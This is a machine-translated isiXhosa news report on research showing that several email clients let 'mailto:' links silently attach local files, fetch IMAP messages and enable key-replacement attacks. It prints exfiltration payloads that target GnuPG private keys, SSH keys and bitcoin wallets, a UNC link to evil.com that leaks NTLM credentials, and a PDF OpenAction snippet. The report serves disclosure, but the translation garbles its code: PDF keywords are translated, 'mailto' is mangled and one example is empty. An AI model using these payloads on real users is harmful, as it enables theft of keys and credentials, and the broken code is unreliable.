Abaphandi abavela kwiYunivesithi yaseRuhr Bochum (eJamani) () ukuziphatha kwabaxhasi beposi xa kusetyenzwa "mailto:" amakhonkco aneparameters eziphambili. Abahlanu kwabangamashumi amabini abaxumi be-imeyile abavavanyiweyo babesemngciphekweni wohlaselo oluye lwakhohlisa ukutshintshwa kovimba kusetyenziswa iparamitha “yokuncamathelisa”. Abanye abathengi be-imeyile abathandathu babesengozini kwi-PGP kunye ne-S/MIME yohlaselo lokubuyisela isitshixo, kwaye abathengi abathathu babesengozini yokuhlaselwa ukukhupha imixholo yemiyalezo efihliweyo.
Unxulumano «"zisetyenziselwa ukuzenzekelayo ukuvula umxhasi we-imeyile ukuze ubhale ileta eya kulowo ubhalileyo ochazwe kwikhonkco. Ukongeza kwidilesi, unokucacisa iiparamitha ezongezelelweyo njengenxalenye yekhonkco, njengomxholo weleta kunye nethemplate yomxholo oqhelekileyo. Uhlaselo olucetywayo lulawula ipharamitha "yokuncamathisela", ekuvumela ukuba uqhoboshele isinamathiselo kumyalezo owenziweyo.
Abathengi bemeyile iThunderbird, i-GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) kunye nePegasus Mail bezisengozini kuhlaselo olungenamsebenzi olukuvumela ukuba uqhoboshele ngokuzenzekelayo. nayiphi na ifayile yendawo, echazwe ngekhonkco elifana ne "mailto:?attach=path_to_file". Ifayile iqhotyoshelwe ngaphandle kokubonisa isilumkiso, ngoko ke ngaphandle kwengqwalasela ekhethekileyo, umsebenzisi akanakuqaphela ukuba ileta iya kuthunyelwa ngesinamathiselo.
Umzekelo, usebenzisa ikhonkco elifana ne “mailto:[imeyile ikhuselwe]&subject=Isihloko&body=Text&attach=~/.gnupg/secring.gpg" ungafaka izitshixo zabucala ezisuka kwi-GnuPG kunobumba. Ungathumela kwakhona imixholo ye-crypto wallets (~/.bitcoin/wallet.dat), izitshixo ze-SSH (~/.ssh/id_rsa) kunye naziphi na iifayile ezifikelelekayo kumsebenzisi. Ngaphezu koko, i-Thunderbird ikuvumela ukuba uncamathisele amaqela eefayile ngemaski usebenzisa ulwakhiwo olufana ne "ncamathisela=/tmp/*.txt".
Ukongeza kwiifayile zasekuhlaleni, abanye abaxumi be-imeyile baqhuba amakhonkco kugcino lwenethiwekhi kunye neendlela kwiseva ye-IMAP. Ngokukodwa, iiNqaku ze-IBM zikuvumela ukuba udlulisele ifayile kulawulo lwenethiwekhi xa ulungisa amakhonkco afana ne-"ncamathisela=\\evil.com\dummyfile", kunye nokuthintela iiparamitha zoqinisekiso lwe-NTLM ngokuthumela ikhonkco kwiseva ye-SMB elawulwa ngumhlaseli. (isicelo siya kuthunyelwa kunye nomsebenzisi weeparamitha zoqinisekiso lwangoku).
IThunderbird iqhubekisela phambili ngempumelelo izicelo ezinje “attach=imap:///fetch>UID>/INBOX>1/”, ekuvumela ukuba uncamathisele umxholo osuka kwiifolda ezikwiseva ye-IMAP. Ngaxeshanye, imiyalezo efunyenwe kwi-IMAP, efihliweyo nge-OpenPGP kunye ne-S/MIME, ikhutshelwa ngokuzenzekela ngumxhasi wemeyile phambi kokuba ithunyelwe. Abaphuhlisi beThunderbird babe malunga nengxaki ngoFebruwari nakumbandela ingxaki sele ilungisiwe (amasebe eThunderbird 52, 60 kunye nama-68 ahlala esengozini).
Iinguqulelo ezindala ze-Thunderbird zikwasengozini kwezinye iintlobo ezimbini zohlaselo kwi-PGP kunye ne-S/MIME ecetywe ngabaphandi. Ngokukodwa, iThunderbird, kunye ne-OutLook, PostBox, eM Client, MailMate kunye ne-R2Mail2, ibiphantsi kohlaselo lokubuyisela olungundoqo, olubangelwa yinto yokuba umxhasi weposi ungenisa ngokuzenzekelayo kwaye afake izatifikethi ezitsha ezithunyelwa kwimiyalezo ye-S/MIME, evumela umhlaseli aququzelele ukutshintshwa kwezitshixo zikawonke-wonke esele zigcinwe ngumsebenzisi.
Uhlaselo lwesibini, apho iThunderbird, iPostBox kunye neMailMate zichaphazeleka khona, ilawula iimpawu zendlela yokugcina imiyalezo eyidrafti ngokuzenzekelayo kwaye ivumela, kusetyenziswa iparameters ze-mailto, ukuqalisa uguqulelo oluntsonkothileyo lwemiyalezo efihliweyo okanye ukongeza utyikityo lwedijithali lwemiyalezo engenamkhethe, Ugqithiso olulandelayo lwesiphumo kumncedisi we-IMAP womhlaseli. Kolu hlaselo, i-ciphertext ihanjiswa ngeparameter "yomzimba", kwaye ithegi "yokuvuselela i-meta" isetyenziselwa ukuqalisa umnxeba kumncedisi we-IMAP womhlaseli. Umzekelo: ' '
Ukusetyenzwa ngokuzenzekelayo amakhonkco e-“mailto:” ngaphandle kokusebenzisana komsebenzisi, amaxwebhu ePDF ayilwe ngokukodwa anokusetyenziswa-isenzo se-OpenAction kwiPDF ikuvumela ukuba uqalise ngokuzenzekelayo umphathi we-mailto xa uvula uxwebhu:
I-%PDF-1.5
1 obj
<< /Uhlobo /Ikhathalogu /OpenAction [2 0 R] >>
endobj
2 obj
<< /Uhlobo /Isenzo /S /URI/URI (imeyile:?body=——QALA UMYALEZO WEPGP——[…])>>
endobj
umthombo: opennet.ru